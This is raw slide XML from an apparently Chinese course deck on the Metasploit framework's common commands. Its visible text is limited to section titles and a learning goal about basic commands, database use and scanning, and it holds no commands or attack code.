                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5965546" y="1843739"/>
              <a:ext cx="641719" cy="301423"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【相关知识】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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20" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3358515" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.2 常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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a:xfrm>
            <a:off x="5590261" y="1695539"/>
            <a:ext cx="5567680" cy="1967865"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="5567680" cy="1967865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="2086569"/>
              <a:ext cx="4902200" cy="1753235"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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150000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>      </a:t>
              </a:r>
              <a:r>
                <a:rPr dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>掌握 Metasploit工具的基本使用方法，了解每个基本命令的作用和使用环境，学习msf数据库的调用命令，查看数据库连接状态和扫描方法等。</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实例】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="D:\用户目录\Desktop\政治审核\PPT用图\Render2.jpgRender2"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="361315" y="2200275"/>
            <a:ext cx="4585335" cy="3115945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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17" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3358515" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.2 常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>了解 Metasploit基本命令</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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22" name="矩形 21"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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23" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3358515" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
